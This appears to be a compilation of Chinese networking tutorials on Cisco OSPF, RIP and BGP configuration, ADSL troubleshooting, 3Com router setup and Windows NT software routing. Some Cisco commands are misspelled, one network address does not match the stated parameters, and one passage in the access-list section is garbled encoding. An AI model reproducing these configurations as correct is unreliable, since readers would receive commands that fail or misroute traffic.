    这时，与例2唯一的不同就是路由配置，不能采用静态路由协议而应该相应地采用非常优秀的OSPF动态路由协议并结合RIP协议。

假设具体网络参数如下：

项目 本地网络
网络号 202.96.199.0
子网掩码 255.255.255.0
OSPF编号 100
OSPF域 202.96.192.0——202.96.207.255，16个C

那么应该这样配置：

Router(config)#router ospf 100(配置OSPF路由)

Router(config-router)#summary-address 202.96.199.0 255.255.255.0

Router(config-router)#redistribute connnected metric-type 1 subnets

Router(config-router)#redistribute static(通过OSPF协议广播静态路由)

Router(config-router)#network 202.96.192.0 0.0.15.255 area 0.0.0.0

Router(config-router)#area 0.0.0.0 authentiication message-digest

Router(config-router)#exit

Router(config)#router rip(配置RIP路由)

Router(config-router)#redistribute ospf 100 metric 1(通过RIP协议广播OSPF路由)

Router(config-router)#passive-interface Serial 0(不在Serial 0上使用)

Router(config-router)#network 202.101.199.0(定义本网络)

Router(config-router)#exit

Router(config)exit

同时，采用OSPF协议时应该在广域网端口上加入授权机制：

Router(config)#int s0

Router(config-if)#ip ospf message-digest-key keyword

Router(config-if)#exit

Router(config)#exit

Router#wr m

更大型的网络会采用BGP边缘路由协议，假设具体网络参数如下：

项目 本地网络 远程网络
AS(自治域) 20000 4000
本地BGP网络 202.96.192.0——202.96.207.255，16个C
202.97.0.0——202.97.15.255，16个C
202.98.128.0——202.98.159.255，32个C

互联地址 202.100.4.2 202.100.4.1

则本地路由器配置方法为：

Router(config)#router bgp 20000(定义本BGP管理的AS--自治域编号)

Router(config-router)#no synchronization

Router(config-router)#network 202.96.192.0 mask 255.255.240.0

(定义本AS--自治域包含的网络)

Router(config-router)#network 202.97.0.0 mask 255.255.240.0

Router(config-router)#network 202.98.128.0 mask 255.255.224.0

Router(config-router)#neighbor 202.100.4.1 remote-as 4000

(定义到远端AS--自治域的网关IP)

Router(config-router)#exit

Router(config)#exit

Router#wr m

    配置完成。

实用技术

一、使用口令加密机制：

Router(config)#service password-encryption(路由器密码将以暗码显示)
二、配置http server，以便从浏览器访问路由器：

Router(config)#ip http server
三、访问控制：

Router(config)#access-list 101 permit ip 10.150.0.0 0.0.255.255 any
    (允许10.150.0.0——10.150.255.255访问)

Router(config)#access-list 101 deny ip 10.151.0.0 0.0.255.255 any
    (禁止10.151.0.0——10.150.255.255访问)

四、负载分担：

要实现负载分担必须使用动态路由协议，以OSPF为例，只要将两条路由的代价(cost)设为相等，即可自动实现。

默认的OSPF代价为广域网线路64，局域网线路30，设置路径代价的命令为：
    Router(config-if)#ip ospf cost xx。

五、常用命令：

Router#help/?(获得帮助)
Router#sh run(显示路由器当前配置)
Router#sh int Xn(接口名称，例如Ethernet 0、Serial 1等，显示接口状态)
Router#sh ip route(显示当前路由)
Router#wr m(储存配置，以便下次重启时使用)
Router#reload(重启路由器)
Router#ping ip-address(测试与其他主机的连接)
Router#telnet host(登录其它主机)

返回


看灯识ADSL故障排除四则

《一键清理系统垃圾》

看灯识ADSL故障排除四则

    在互联网迅速发展的今天，ADSL宽带接入正凭借速度快。价格低的优势，成为个人用户网络接入方式的首选。大家知道，ADSL Modem在接受到数据信号后，它的信号灯会不停地闪烁。对于这看似平凡的“闪烁”现象，刚刚接触ADSL的朋友，肯定不会知道其中的奥妙。其实，观察信号灯的状态，您有时也能分析出网络的故障呢！不信？那就来看看下面的内容吧！

    识别线路故障

    ADSL Modem有一个CD指示灯或Link指示灯，通过查看该灯的工作状态，您就可以简单识别出与ADSL Modem相连接的通信线路的连接故障了。正常工作情况下，这种指示灯会在接通电源后，很快处于长亮状态，如果出现其他异常状态，就说明线路上可能有故障存在，具体表现在：

    ★如果CD指示灯或Link指示灯一直闪烁不停的话，就表示当前线路上的通信信号不稳定，倘若过一阵子就恢复为正常时，就表明该指示灯闪烁状态是由电信公司的内部线路调整引起的。

    ★如果该指示灯一直闪烁不停而无法恢复为正常时，就意味着通信线路真的有故障存在。此时您可以测试一下电话线中是否有信号存在，有信号就表示线路工作很正常，如果没有测试到信号，就表明线路可能出现短接或断路现象，这时必须请专业检修人员来帮助您修复线路故障了。

    ★如果在电话线路上有信号的情况下，该指示灯还处于一直闪烁状态，那就意味着端口有问题。此时您可以检查一下ADSL线路在入户时，所必须用到的分离器有没有连接好。看看分离器之前，还有没有连接其他设备，比方说使用了分机或防盗系统等。如果上面的问题全部排除了，该指示灯的状态还不恢复正常的话，就需要请通信公司的工作人员，来重新设置网络端口，一般来说重设网络端口时，都会产生信号的，如果还不行的话，可以考虑更换一个新的ADSL Modem。

    当然，这里笔者需要提醒各位的是，即使可以使用电话线来接听电话，也不能断定线路肯定没有故障，因为ADSL信号与电话信号，不是使用的同一信道哟!

    识别电源故障

    利用ADSL Modem中的Power指示灯，您可以简单地判断电源是否出现故障。如果ADSL Modem在接通电源的情况下，发现Power指示灯不亮的话，可以断定该设备的电源十有八九出了问题，或是ADSL电源转换器有故障。此时，惟一的办法，就是与销售商家或专业维修店联系。

    识别硬件故障

    利用ADSL Modem中的Test指示灯或Diag指示灯，您可以清楚自己的设备是否顺利通过自检测试。一般来说，该指示灯在刚接通ADSL Modem的电源时，才会出现闪烁现象，这表明ADSL正处于自检状态之中，一旦自检任务完成后，该指示灯就会自动熄灭。如果该指示灯一直处于长亮状态，就表明该ADSL Modem没有顺利通过自检，此时您可以先关闭ADSL Modem，然后再接通电源看看，或者直接按复位按钮，来看看是否能解决故障。如果故障不能解决的话，基本上可以断定是硬件设备有问题，必须重新更换。

    识别网络故障

    利用ADSL Modem中的LAN指示灯，您可以简单地诊断出与自己计算机相连的网络设备和连接是否正常。正常情况下，该指示灯是处于常亮状态。如果不常亮的话，就表明网络连接可能出现故障，具体表现在：

    在CD指示灯或Link指示灯常亮的条件下，如果LAN指示灯不亮，就表示ADSL Modem和网卡之间的网络连接有故障出现。此时，您可以去尝试更换另外一个新网卡。

    如果LAN指示灯常亮，但不能正确使用ADSL拨号时，可能是拨号软件出现问题，此时您可以将它从系统中彻底删除，并重新正确地安装拨号软件，并使用正确拨号用户名与密码。如果还无法工作的话，就必须按下ADSL Modem中的复位按钮，让ADSL Modem采用默认的网络参数来工作。注意，在按复位按钮时，您先找到该设备上的一个直径为2毫米左右的圆孔，在接通电源的条件下，用笔芯之类的坚硬东西戳进去，就可以感觉到按钮被按下了，同时必须保持这种状态10秒钟以上，才能算复位成功。

    如果LAN指示灯处于常亮状态，ADSL Modem还不能进行通讯的话，您必须认真检查一下与计算机相连接的网卡IP地址是否正确。注意网卡IP地址.一定要与ADSL Modem的LAN口处的IP地址处在同一网段内，否则无法正常通信。


快速配置3COM NetBuilder RO224

《一键清理系统垃圾》

快速配置3COM NetBuilder RO224

    我们单位最近购进了多台3COM NETBuilder Remote Office224，3COM路由器中的参数非常多，在实际应用中只需对其中的小部分进行设置，大部分参数可使用默认值或不设置。下面我就自己在实际工作中的经验，对如何快速配置3COM NetBuilder RO224路由器做一详细介绍，希望能和大家共享。

    准备工作

    1.了解NBRO路由器

    NBRO(NETBuilder Remote Office)路由器系列具有固定的端口配置，它包括一个控制台CONSOLE端口(主要用于路由器的配置)、一个Ethernet端口(用于连接局域网,即1口)、三个WAN同步端口（即2、3、4口），接口标准分别为V.35、RS-449及RS-232。

    2.配置方式

    配置路由器的三种常用方式是：一，以终端的方式连接路由器的CONSOLE口进行配置；二，使用TCP/IP协议族中的TELNET命令，登录到路由器进行配置；三，使用网络管理软件进行路由器配置。对于新购的设备，只能使用第一种方式。

    3．设置串口通信

    串口通信软件很多，下面以Windows98系统为例做一介绍。选用Windows98环境下超级终端功能，单击“开始”→“程序” →“附件” →“通讯”→“超级终端”，双击“Hypertrm”图标可进入超级终端，新建立一个连接。使用通讯串口1，设置参数为：速率9600bps；数据位8,奇偶校验无，停止位1，软件流控Xon/Xoff。

    注意：速率一定为9600bps，否则会出现乱字符或连接不通。

    建立连接

    1．确定要操作的路由器和微机的电源都处于断电状态；

    2．用一条CONSOLE通信线，一端连接到微机上的COM1口，另一端连接到路由器的CONSOLE口，注意将两端都固定好；

    3．设置好MODEM的工作方式(和X.25连接的MODEM设置为同步专线方式)；

    4．通过相应的电缆连接路由器和MODEM，根据所使用的广域网口确定使用什么电缆。

    设置路由器状态

    1．接通微机电源；

    2．运行串口通信软件，这时在键盘上的敲击动作在显示屏幕上将没有到任何反应；

    3．把要操作的路由器电源连接好，打开电源开关；

    4．在显示器上，能看到一些有关路由器上电自检（POWER UP self-TESTS)及系统启动(SYSTEM BOOT)等信息，这个过程约需3～5分钟。该过程的结束标志是在显示器上出现一行类似如下的信息：“Mon Oct 30 10:32:09 1996 System initialized and Running”。

    5．敲击键，显示“NetLogin:”，这说明，已经完成了配置前的准备工作并正确建立了微机与路由器间的连接，可以转入下一步。

    注意：在第四步中，如果在显示屏幕上看不到路由器的任何信息，请反复检查你的通信线路和串口通信软件是否合适、微机与路由器的连接是否可靠、路由器电源是否真的连接好、速率设置是否为9600bps等等。

    配置路由器

    1．注册

    路由器设有两级权限，即网络管理权限(Manager Privilege)和用户权限（User Priviledge)。用户权限下不能对路由器进行配置，但可以查看部分参数。用户权限口令没有设置，在Password后面直接敲入即可。在命令行提示符下敲入“？”，可显示用户可使用的命令。

    要对路由器进行配置，需要路由器的网络管理权限，即以root作为注册名，并输入正确的口令。3COM路由器出厂时没有设置网络管理权限的口令，在出现Login时敲入root，在Password后面直接敲入,即可进入网络管理权限命令方式下。

    在路由器的网络管理权限下，可以用syspassword命令重新设置或修改该路由器的网络管理口令和用户权限口令。

    2．进行配置

    下面有些命令的执行可能需要一定的时间，等待命令行提示符NETBuilder#出现后,再敲入下一条命令。

    （1）激活路由器的路由功能

    NETBuilder# setd -ip control = route

    （2）配置局域网(LAN)端口，路由器只有一个局域网口，即1口。

     NETBuilder#setd !1 -ip net=200.28.1.250 255.255.255.0

    设置路由器使用的LAN IP 地址和子网掩码

    NETBuilder # setd !1 -path cont = e

    激活路由器的局域网路径path

    NETBuilder # setd !1 -port cont = e

    激活路由器的局域网端口port

    （3）配置广域网WAN端口X.25，以广域网端口2为例，

    NETBuilder# setd !2 -path ba = 64

    设置V.35端口所连接专线的速率

    NETBuilder# setd !2 -path linetype = leased

    设置V.35端口使用的数据通信线路类型为专线

    NETBuilder# setd !2 -port own = x25

    设置V.35端口的使用者，指明该端口用于建立x.25连接

    NETBuilder# setd !2 -x25 x25a = 39042134

    设置该路由器使用的X.25地址，由邮局提供，此地址共12位，直接填写后8位，国家号4603不要填写。

    NETBuilder# setd !2 -x25 tsvc = 1,16

    设置X.25连接要使用的交换虚电路(svc)的数目，由邮局提供

    NETBuilder# setd !2 -ip net = 100.22.28.1 255.255.0.0

    设置路由器使用的广域网WAN IP 地址及子网掩码

    NETBuilder# add -ip addr = 100.22.28.2 #39042109

    将通信方的IP地址与X.25地址添加到路由器的地址对照表

    NETBuilder# setd !2 -path cont＝e

    激活路由器的广域网V.35路径PATH

    NETBuilder# setd !2 -port cont＝e

    激活路由器的广域网V.35端口PORT

    注意：以上有些指令执行后均会显示一行类似如下的信息：“Note: you must enable Path Control for this Path to take this parameter into effect”，对此信息不要管它，继续下面的操作即可。

    （4）配置静态路由表

    NETBuilder# add -ip rout = 46.224.33.0 255.255.255.0 100.22.28.61 1

    在静态路由表里添加到远程站点使用x.25的路由

    注意：可用命令sh -ip rou 查看你所配置的静态路由表；可用命令del -ip rou =〈Remote IP Address〉〈Gateway〉删除表中的错误项。

    3．完成配置

    配置完成时，应从路由器的网络管理权限下退出。输入下面的命令。

    NETBuilder# exit

    显示器上将显示“Netlogin:”，至此，已经完成了路由器的配置工作。现在可以退出串口通信软件，拆除通信线。

返回


宽带不能连通一例

《一键清理系统垃圾》

宽带不能连通一例

《中国电脑教育报》张近东

    我们这个小区推出了宽带接入60元包月，虽然入户只有10Mb但是对于我那只56k软“猫”，每月上百元的电话费来说也是非常划算的。于是我飞奔电脑城买来一块网卡接上了宽带。开始的两个月对我来说简直就是神仙的日子。可是好景不常和我的电脑连接的交换机总是出问题，每天打开电脑后先要用ping命令看看网络是否连通，当然多数是不通的，然后给宽带商打一个电话，他们的服务很好，现在我们这几户和那几个技术人员都很熟了。可我的电话费也长上去了。每回技术员都说是电压不稳把交换机烧了，换一个就行了，但是每次都用不了多长时间，到了最后连换了两个也没解决问题，看着技术员愁眉苦脸的样子，我问是不是电源线接的有问题？他们都认为不可能。我说试试死马当活马医吧，万一行呢？于是从我家接了一个插座结果故障真的排除了，后来检查发现接交换机的电源的火线因为没有包好出现的虚接现象重新接线后到现在已经有一个多月没有出现问题。

    在这里写出来，希望能给遇到这类现象的朋友一些帮助。

    编后：业内人士称今年将是宽带年，作为宽带的一种方式LAN广泛的应用于办公室和社区带宽接入。使用中你是否也遇到了一些实际操作的困难呢？有关这方面的内容欢迎大家跟我交流。来信请到ns＠cce.com.cn。


宽带路由器常见故障巧排除

《一键清理系统垃圾》

宽带路由器常见故障巧排除

出处：网络转载

宽带路由器常见故障巧排除在SOHO和中小型企业用户中，宽带路由器应用非常普遍。对于一些网络新手来说，出现一些说明手册未涉及的故障，有时难以应付。下面，笔者就一些常见的故障和问题进行分析，并提供解决方法。

一、 线路不通，无法建立连接

1. 用网线将路由器的WAN口与ADSL Modem相连，电话线连ADSL Modem的“Line”口。ADSL Modem与宽带路由器之间的连接应当使用直通线。

2. 检查路由器LAN中的Link灯信号是否显示，路由器至局域网是否正常联机。路由器的LAN端口既可以直接连接至计算机，也可以连接至交换机。

二、网络设置不正确

查看手册找到路由器默认管理地址，例如，路由器默认IP地址是192.168.123.1，掩码是255.255.255.0，请将您的计算机接到路由器的局域网端口，可以使用两种方法为计算机设置IP地址。

1.手动设置IP地址。 设置您计算机的IP地址为192.168.123.xxx(xxx范围是2至254)，子网掩码为255.255.255.0，默认网关为192.168.123.1。采用小区宽带接入方式时，应当确保DHCP分配的内部IP地址与小区采用的IP地址在不同的网段。

2.利用路由器内置DHCP服务器自动设置IP地址。 1) 将您计算机的TCP/IP协议设置为“自动获得IP地址”、“自动获得DNS服务器地址”。 2) 关闭路由器和您的计算机电源。首先打开路由器电源，然后再启动您的计算机。

三、无法进行ADSL拨号

打开Web浏览器，在地址栏中输入路由器的管理地址，例如192.168.123.1，此时系统会要求输入登录用户名和密码。该用户名和密码可以在产品的说明书上查询到。进入管理界面，选择菜单“网络参数”下的“WAN口设置”，在右边主窗口中，“WAN口连接类型”选择“PPPoE”，输入“上网账号”及“上网口令”，点击连接按钮即可。

四、ISP绑定MAC地址造成无法连接

有些宽带提供商为了限制接入用户的数量，在认证服务器上对MAC地址进行了绑定。此时，可先将被绑定MAC地址的计算机连接至路由器LAN端口(但路由器不要连接Modem或ISP提供的接线)，然后，采用路由器的MAC地址克隆功能，将该网卡的MAC地址复制到宽带路由器的WAN端口。在Windows2000/XP下按“开始→运行”，输入“cmd/k ipconfig /all”，其中“Physical Address”就是本机MAC地址。

五、上网一段时间后就掉线，关闭路由器后再开启又可以连通

1) 网络中过多DHCP服务器引起IP地址混乱。您需要将网络中的所有DHCP服务器关闭，使用手动指定IP地址方式或仅保留一个DHCP服务器。这些DHCP服务器可能存在于Windows2000/NT服务器、ADSL路由器和ADSL Modem当中。

2) 该型号路由器与ISP的局端设备不兼容。这类问题只有换用其他型号的路由器或者ADSL Modem，再观察问题是否解决。

3) 路由器和ADSL设备散热不良。如刚上网时正常，过一会网速下降，这时如果用手摸设备很烫，换一个设备速度就正常，说明散热环 境不好。

4) 查看所有连接的计算机是否有蠕虫病毒或者木马，请先使用杀毒工具和木马专杀工具扫描清除掉计算机内的病毒或者木马然后再接在网络上。

六、为何网费远远超出预计费用

如果是非包月用户，可以选择“按需连接”或者“手动连接”，并且输入自动断线等待时间，防止忘记断线一直连接而浪费上网时间。如果采用计时收费的资费标准，应当将路由器设置为“按需连接”，同时还应当设置自动断线的等待时间，即当在指定的时间内没有Internet访问请求时，路由器能够自动切断ADSL连接。

七、为什么会出现能用QQ和玩游戏、但是不能打开网页的现象

这种情况是DNS解析的问题，建议在路由器和计算机网卡上手动设置DNS服务器地址(ISP局端提供的地址)。另外，在“DHCP服务”设置项，也手动设置DNS服务器地址，该地址需要从ISP供应商那里获取。

八、忘记了登录路由器管理页面的密码

一般来说，宽带路由器设备后面或前面都有一个Reset按钮，根据说明书按住这个按钮数秒会恢复缺省配置，登录Web的用户名和密码分别恢复成初始值。


利用WINDOWS NT设置软件路由

《一键清理系统垃圾》

利用WINDOWS NT设置软件路由

    目前，实现网络互连的方法有很多种，如使用中继器、网桥、网关或路由器等。其中路由器以阻塞控制、差错隔离、网络安全及便于管理等特性得到广泛应用。在路由的实现过程中，根据实现方法的不同，又可分为专用路由器路由及软件路由。所谓软件路由是指用一台安装了多个网卡的计算机，通过软件将其设置为路由器。专用路由器路由在速度、流量控制方面都较优越，适用于多个网络的互连。但在一个较小的工作组级网络环境中，如果只涉及两个子网，则采用软件路由更能保护现有硬件资源，减少网络资金投入。本文结合自己的工作经验，对在两个子网之间利用WINDOWSNT网络操作系统进行路由设置作一介绍。

一、网络环境介绍

    这里介绍的网络环境取自于本单位所建网络环境的一部分。我院建网的主要目的是为了便于院内各部门内部和部门之间的资源共享和信息交换。由于各个部门的工作性质及对网络需求的不同，分配给各部门的网络节点数目也不同。对于上网节点较少、对部门内部数据共享与交换要求不高的部门，我们采用直接将这些部门的网络节点并入院内公用主网的方法。而对于网络节点较多、对部门内部信息交换和资源共享要求较高的部门，则采用单独将该部门各节点构成一个子网，再将该子网与院内公用主网互连起来的方法。部门内部的信息交流在子网中进行，当部门内部节点需要和院内其他部门交流时，则通过公用主网与其他部门进行信息交换，或共享主网上的数据资源。这样做的优点是通过分割网段来达到降低院内公用主网和部门子网的网络流量、提高各网内部的传输速度与使用效率的目的，而且对于部门子网的数据安全性也起到了一定的保护作用。
    在进行部门子网与公用主网互连时，由于我们的目的只是为了能够实现部门子网对公用主网的访问，其他要求并不高，而且部门子网和公用主网的物理位置相隔较近，因此出于利用现有硬件资源、降低网络资金投入的目的，我们决定利用软件路由来实现部门子网与公用主网的互连。网络拓扑结构图如图（一）所示，由两个物理网段组成，划分为两个子网。子网A是院内公用主网，子网B是部门内部网络。其中主服务器采用COMPAQ Proliant1500专用服务器，部门服务器采用Pentium133MHz586高档微机。部门内部的信息交流在部门子网B中进行，当需要和其他部门交流或访问单位公用数据时，则需跨越子网B访问主服务器。由于部门子网B与公用主网A在物理上是不连通的，若要使子网B上的网络节点访问主服务器，就必须将部门服务器设置成为路由器，以转发两个子网之间的信息。WINDOWSNT就提供了这样的设置软件路由的功能。WINDOWSNT是一种支持多协议的网络操作系统，它提供三种网络协议：NWLINK、NETBEUI、TCP／IP。NEWLINK用于提供与NOVELL网络的连通性；NETBEUI是用于仅限于一个子网的快速短小的网络协议，它不支持路由；TCP／IP是一个支持多平台、可用于异种网络互连、支持路由、连接性能强的一种网络协议，它是计算机网络协议的 一个标准。我们在安装TCP／IP的过程中，发现该协议提供了设置软件路由的功能。因此，我们在部门子网与公用主网的互连实施上，就采用了利用WINDOWSNT设置软件路由的方法。

二、TCP／IP报文传送与路由原理

    在TCP／IP网络中，每个网络节点都由一个唯一的IP地址来标识，同时网络节点上的路由表信息也由IP地址组成。IP地址是一个32位的二进制数值，但它一般用十进制格式表示，以便于用户使用。每个八位位组用一个十进制数表示，并以圆点分隔。例如，二进制格式的IP地址为01101101．01101110．00000101．00000111，十进制格式表示为109．110．5．7。IP地址能用作一个唯一地址来标识网络中的节点，与底层的硬件地址无关。
    IP地址由两部分组成：网络部分和节点部分，分别标识网络ID和节点ID。网络ID表示网络节点所在的网络，节点ID指明在此网络中的节点。其中网络ID位于IP地址的高字节部分，节点ID位于IP地址的低字节部分。根据网络ID所占用IP地址的高字节的不同，IP地址又可分为A类IP地址、B类IP地址、C类IP地址等。
    A类IP地址：IP地址的第1个八位表示网络ID，后3个八位表示节点ID。网络首字节的范围是001—126。IP地址的十进制表示形式为（001—126）．X．Y．Z。
    B类IP地址：IP地址的前2个八位表示网络ID，后2个八位表示节点ID。网络首字节的范围是128—191。IP地址的十进制表示形式为（128—191）．X．Y．Z。
    C类IP地址：IP地址的前3个八位表示网络ID，最后1个八位表示节点ID。网络首字节的范围是192—223。IP地址的十进制表示形式为（192—223）．X．Y．Z。
    网络上各节点借助网络ID与节点ID来判别报文该如何发送及发送的范围。当网络中某个节点发送TCP／IP报文时，发送方的IP地址和接收方的IP地址被包含在TCP／IP报文中，节点首先提取IP地址的网络ID，通过比较接收方节点IP地址的网络ID与自己IP地址的网络ID是否一致来判断接收方节点与自己是否在同一个子网。若二者一致，则说明报文的发送与接收方处于同一个子网，这时报文就在该子网内直接发送，同一子网的其他节点都会收到该报文，根据报文的目标地址判断该报文是否发送给自己。否则，若经判断，发现目标节点的IP地址网络ID与自己的IP地址网络ID不一致，说明报文的接收方在另一个子网，则查阅路由表或缺省网关，判断是否能将报文转发到指定路由上。若能够，则转发报文到指定路由上，由该路由器负责发送报文到与之相连的子网，然后再在那个子网中继续发送。否则，提示路径出错信息。
    从TCP／IP报文的IP地址域取出网络ID和节点ID需要依靠子网掩码。子网掩码与IP地址的表现形式一样，也是32位二进制表示的一个数值，每个八位位组可用十进制数表示，各组之间用圆点分隔。例如：255．255．255．0。子网掩码中值为“1”的位对应网络ID，值为“0”的位对应节点ID。也就是说，当节点从IP地址中抽取网络ID时，它通过将IP地址与子网掩码进行“与”运算来获得网络ID。缺省情况下，A类子网的子网掩码为255．0．0．0，B类子网的子网掩码为255．255．0．0，C类子网的子网掩码为255．255．255．0。

三、设置软件路由

    根据上述报文发送与路由的原理，很容易利用WINDOWS NT中TCP／IP协议提供的设置路由功能进行软件路由设置。下面就结合我院路由参数的设置，给出利用WINDOWSNT在部门服务器上设置软件路由的步骤：
    （1）安装TCP／IP协议。TCP／IP协议实际上是一组协议的组合。在安装TCP／IP协议时，屏幕会提示你选择许多组件，这时你必须至少选择“Connectivity”组件，以便使用其提供的连接工具与测试工具，测试报文是否从一个子网被成功地转发至另一子网。从WINDOWSNT的Control Panel中双击Network图标，进入“Network Settings”对话框，选择“Add Software”按钮，从“Network Software”列表框中选择“TCP／IP Protocol and related components”选项，然后单击“Continue”，屏幕提示你选择组件，选上“Connectivity Utilities”复选框，单击“Continue”，按照屏幕提示完成协议的安装。
    （2）重新启动系统，以使协议配置生效。
    （3）双击Control Panel中的Network图标，进入“Network Settings”对话框，在“Installed Network Software”列表框中选择“TCP／IP protocol”选项，单击“Configure”按钮。进入“TCP／IP Configuration”对话框，清除“Enable Automatic DHCP Configuration”复选框，对每个网卡配置正确的IP地址、子网掩码和缺省网关（DG）。必要的话，还需填写合适的“Primary Wins Server”和“Secondary Wins Server”，以提供计算机名字服务。需要注意的是，每个网卡的地址必须对应自己所在的子网，而缺省网关则填写互为路由的另一网卡的地址。
    例如，在上文介绍的网络环境中，涉及两个子网，分别为156．157．158和222．222．222。图（二）对应图（一），给出了部门服务器上的路由设置。
    （4）单击“Advanced”按钮，进入“Advanced Microsoft TCP／IP Configuration”对话框选上“Enable IP Routing”复选框，以使该机器支持路由。另外，对于子网中基于DOS和WINDOWS3．X的客户，为使能以计算机名而不仅是IP地址进行跨越子网的访问，还需选上“Enable wins proxy Agent”复选框，连续单击OK，以确定以上配置。
    （5）分别在两个子网的客户节点上，装上客户端安装软件提供的TCP／IP协议。对每个节点赋予一个唯一的IP地址，在缺省网关处则填入自己子网内充当路由的那个网卡的地址。例如，在图（二）中，子网A内各节点的缺省网关为156．157．158．15，子网B内各节点的缺省网关为222．222．222．200。
至此，部门服务器的路由设置已经完成。为了测试报文是否能够被正确地从一个子网络由至另一个子网，可以利用TCP／IP协议...

返回


路由

《一键清理系统垃圾》

路由

1、什么时候使用多路由协议？
           当两种不同的路由协议要交换路由信息时，就要用到多路由协议。当然，路由再分配也可以交换路由信息。下列情况不必使用多路由协议：
           从老版本的内部网关协议（ Interior Gateway Protocol，I G P）升级到新版本的I G P。
           你想使用另一种路由协议但又必须保留原来的协议。
           你想终止内部路由，以免受到其他没有严格过滤监管功能的路由器的干扰。
           你在一个由多个厂家的路由器构成的环境下。
           什么是距离向量路由协议？
           距离向量路由协议是为小型网络环境设计的。在大型网络环境下，这类协议在学习路由及保持路由将产生较大的流量，占用过多的带宽。如果在9
           0秒内没有收到相邻站点发送的路由选择表更新，它才认为相邻站点不可达。每隔30秒，距离向量路由协议就要向相邻站点发送整个路由选择表，使相邻站点的路由选择表得到更新。这样，它就能从别的站点（直接相连的或其他方式连接的）收集一个网络的列表，以便进行路由选择。距离向量路由协议使用跳数作为度量值，来计算到达目的地要经过的路由器数。

           例如，R I P使用B e l l m a n - F o r
           d算法确定最短路径，即只要经过最小的跳数就可到达目的地的线路。最大允许的跳数通常定为1 5。那些必须经过1
           5个以上的路由器的终端被认为是不可到达的。
           距离向量路由协议有如下几种： IP RIP、IPX RIP、A p p l e Talk RT M P和I G R P。
           什么是链接状态路由协议？
           链接状态路由协议更适合大型网络，但由于它的复杂性，使得路由器需要更多的C P
           U资源。它能够在更短的时间内发现已经断了的链路或新连接的路由器，使得协议的会聚时间比距离向量路由协议更短。通常，在1
           0秒钟之内没有收到邻站的H E L
           LO报文，它就认为邻站已不可达。一个链接状态路由器向它的邻站发送更新报文，通知它所知道的所有链路。它确定最优路径的度量值是一个数值代价，这个代价的值一般由链路的带宽决定。具有最小代价的链路被认为是最优的。在最短路径优先算法中，最大可能代价的值几乎可以是无限的。

           如果网络没有发生任何变化，路由器只要周期性地将没有更新的路由选择表进行刷新就可以了（周期的长短可以从3 0分钟到2个小时）。
           链接状态路由协议有如下几种： IP OSPF、IPX NLSP和I S - I S。
           一个路由器可以既使用距离向量路由协议，又使用链接状态路由协议吗？
           可以。每一个接口都可以配置为使用不同的路由协议；但是它们必须能够通过再分配路由来交换路由信息。（路由的再分配将在本章的后面进行讨论。）
           2、什么是访问表？
           访问表是管理者加入的一系列控制数据包在路由器中输入、输出的规则。它不是由路由器自己产生的。访问表能够允许或禁止数据包进入或输出到目的地。访问表的表项是顺序执行的，即数据包到来时，首先看它是否是受第一条表项约束的，若不是，再顺序向?葱校蝗绻??氲谝惶醣硐钇ヅ洌?蘼凼潜辉市砘故潜唤?梗?疾槐卦僦葱邢旅姹硐畹募觳榱恕?

           每一个接口的每一种协议只能有一个访问表。
           支持哪些类型的访问表？
           一个访问表可以由它的编号来确定。具体的协议及其对应的访问表编号如下：
           ◎I P标准访问表编号：1～9 9
           ◎I P扩展访问表编号：1 0 0～1 9 9
           ◎I P X标准访问表编号：8 0 0～8 9 9
           ◎I P X扩展访问表编号：1 0 0 0～1 0 9 9
           ◎AppleTa l k访问表编号：6 0 0～6 9 9
           提示在Cisco IOS Release11.2或以上版本中，可以用有名访问表确定编号在1～199的访问表。
           如何创建IP标准访问表？
           一个I P标准访问表的创建可以由如下命令来完成： Access-list access list number {permit |
           deny} source [source-mask]
           在这条命令中：
           ◎access list number：确定这个入口属于哪个访问表。它是从1到9 9的数字。
           ◎permit | deny：表明这个入口是允许还是阻塞从特定地址来的信息流量。
           ◎source：确定源I P地址。
           ◎s o u r c e - m a s
           k：确定地址中的哪些比特是用来进行匹配的。如果某个比特是"1"，表明地址中该位比特不用管，如果是"0"的话，表明地址中该位比特将被用来进行匹配。可以使用通配符。

           以下是一个路由器配置文件中的访问表例子：
           Router# show access-lists
           Standard IP access list 1
           deny 204.59.144.0, wildcard bits 0.0.0.255
           permit any
           3、什么时候使用路由再分配？
           路由再分配通常在那些负责从一个自治系统学习路由，然后向另一个自治系统广播的路由器上进行配置。如果你在使用I G R P或E I G R
           P，路由再分配通常是自动执行的。
           4、什么是管理距离？
           管理距离是指一种路由协议的路由可信度。每一种路由协议按可靠性从高到低，依次分配一个信任等级，这个信任等级就叫管理距离。对于两种不同的路由协议到一个目的地的路由信息，路由器首先根据管理距离决定相信哪一个协议。

           6、如何配置再分配？
           在进行路由再分配之前，你必须首先：
           1) 决定在哪儿添加新的协议。
           2) 确定自治系统边界路由器（A##R）。
           3) 决定哪个协议在核心，哪个在边界。
           4) 决定进行路由再分配的方向。
           可以使用以下命令再分配路由更新（这个例子是针对OSPF的）：
           router(config-router)#redistribute protocol [process-id] [metric
           metric - value ] [metric-type type - value ] [subnets]
           在这个命令中：
           ◎protocol：指明路由器要进行路由再分配的源路由协议。
           主要的值有： bgp、eqp、igrp、isis、ospf、static [ ip ]、connected和rip。
           ◎process-id：指明OSPF的进程ID。
           ◎metric：是一个可选的参数，用来指明再分配的路由的度量值。缺省的度量值是0。
           7、为什么确定毗邻路由器很重要？
           在一个小型网络中确定毗邻路由器并不是一个主要问题。因为当一个路由器发生故障时，别的路由器能够在一个可接受的时间内收敛。但在大型网络中，发现一个故障路由器的时延可能很大。知道毗邻路由器可以加速收敛，因为路由器能够更快地知道故障路由器，因为hello报文的间隔比路由器交换信息的间隔时间短。

           使用距离向量路由协议的路由器在毗邻路由器没有发送路由更新信息时，才能发现毗邻路由器已不可达，这个时间一般为10～90秒。而使用链接状态路由协议的路由器没有收到hello报文就可发现毗邻路由器不可达，这个间隔时间一般为10秒钟。

           距离向量路由协议和链接状态路由协议如何发现毗邻路由器？
           使用距离向量路由协议的路由器要创建一个路由表（其中包括与它直接相连的网络），同时它会将这个路由表发送到与它直接相连的路由器。毗邻路由器将收到的路由表合并入它自己的路由表，同时它也要将自己的路由表发送到它的毗邻路由器。使用链接状态路由协议的路由器要创建一个链接状态表，包括整个网络目的站的列表。在更新报文中，每个路由器发送它的整个列表。当毗邻路由器收到这个更新报文，它就拷贝其中的内容，同时将信息发向它的邻站。在转发路由表内容时没有必要进行重新计算。

